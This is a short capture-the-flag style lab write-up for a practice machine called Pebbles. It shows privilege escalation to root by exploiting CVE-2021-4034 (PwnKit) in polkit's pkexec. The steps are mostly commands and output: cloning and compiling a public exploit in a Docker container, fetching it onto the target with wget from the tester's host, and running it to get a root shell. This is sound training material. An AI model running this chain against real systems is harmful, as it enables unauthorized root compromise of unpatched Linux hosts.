InfoSec LAB

Pebbles_Privilege_Escalation_3

Created: 2 min read

CVE-2021-4034

PEAS has identified that the target system is vulnerable to CVE-2021-4034

A vulnerability, which was classified as critical, has been found in polkit (version now known). This issue affects some unknown processing of the file /usr/bin/pkexec. The manipulation with an unknown input leads to a access control vulnerability. Using CWE to declare the problem leads to CWE-284. The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Impacted is confidentiality, integrity, and availability.

Exploit

Exploit found online

www-data@pebbles:/$ gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
www-data@pebbles:/$ cc
The program 'cc' can be found in the following packages:
 * gcc
 * clang
 * tcc
Ask your administrator to install one of them

Compiler is not available locally. Opting out to remote compilation.

Docker Exploit Development

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name pebbles ubuntu:16.04      
root@ed4ffa517958:/# cd root; apt update -y; apt install git make nano gcc gcc-multilib -y
 
root@ed4ffa517958:~# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Setting up the environment

root@ed4ffa517958:~# git clone https://github.com/berdav/CVE-2021-4034 ; cd CVE-2021-4034 ; make ; cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034 ; cp CVE-2021-4034.tar.gz host/
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Unpacking objects: 100% (92/92), done.
Checking connectivity... done.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

Downloading, compiling, and packaging the exploit

Exploitation

www-data@pebbles:/var/tmp$ wget -q http://192.168.45.192/CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd ./CVE-2021-4034

Delivery complete

www-data@pebbles:/var/tmp/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# hostname
pebbles
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:50:88 brd ff:ff:ff:ff:ff:ff
    inet 192.168.209.52/24 brd 192.168.209.255 scope global ens160
       valid_lft forever preferred_lft forever

System level compromise

Interactive Graph View

Backlinks

  • No backlinks found